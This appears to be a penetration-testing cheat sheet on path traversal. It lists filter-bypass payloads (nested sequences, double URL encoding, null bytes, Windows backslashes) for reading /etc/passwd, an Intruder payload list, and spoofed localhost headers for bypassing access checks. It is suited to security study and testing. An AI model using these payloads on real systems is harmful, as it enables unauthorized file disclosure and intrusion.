# Path Traversal 1. Application blocks traversal sequences but treats the supplied filename as being relative to a absolute path and can be exploit with `/etc/passwd`absolute path to target file payload. 2. Images on target is loaded using `filename` parameter, and is defending against traversal attacks by stripping path traversal. Exploit using `....//....//....//....//etc/passwd` payloads. 3. Superfluous URL-encoded `..%252f..%252f..%252fetc/passwd` payload can bypass application security controls. 4. Leading the beginning of the filename referenced with the original path and then appending `/var/www/images/../../../etc/passwd` payload at end bypasses the protection. 5. Using a **null** byte character at end plus an image extension to fool APP controls that an image is requested, this `../../../etc/passwd%00.png` payload succeed. 6. Double URL encode file path traversal, as example this `../../../../../../../../../../etc/hostname` will be URL double encoded as, `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fhostname`. 7. Windows OS accept both `../` and `..\` for directory traversal syntax, and as example retrieving `loadImage?filename=..\..\..\windows\win.ini` on windows target to ***identify*** valid path traversal. Intruder payloads list: ``` /etc/passwd ....//....//....//....//etc/passwd ..%252f..%252f..%252fetc/passwd /var/www/images/../../../etc/passwd ../../../etc/passwd%00.png %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd ``` ## Headers to bypass access to files ``` X-Custom-IP-Authorization: 127.0.0.1 X-Forwarded-For: localhost X-Forward-For: localhost X-Remote-IP: localhost X-Client-IP: localhost X-Real-IP: localhost X-Originating-IP: 127.0.0.1 X-Forwarded: 127.0.0.1 Forwarded-For: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-ProxyUser-Ip: 127.0.0.1 X-Original-URL: 127.0.0.1 Client-IP: 127.0.0.1 True-Client-IP: 127.0.0.1 Cluster-Client-IP: 127.0.0.1 X-ProxyUser-Ip: 127.0.0.1 ```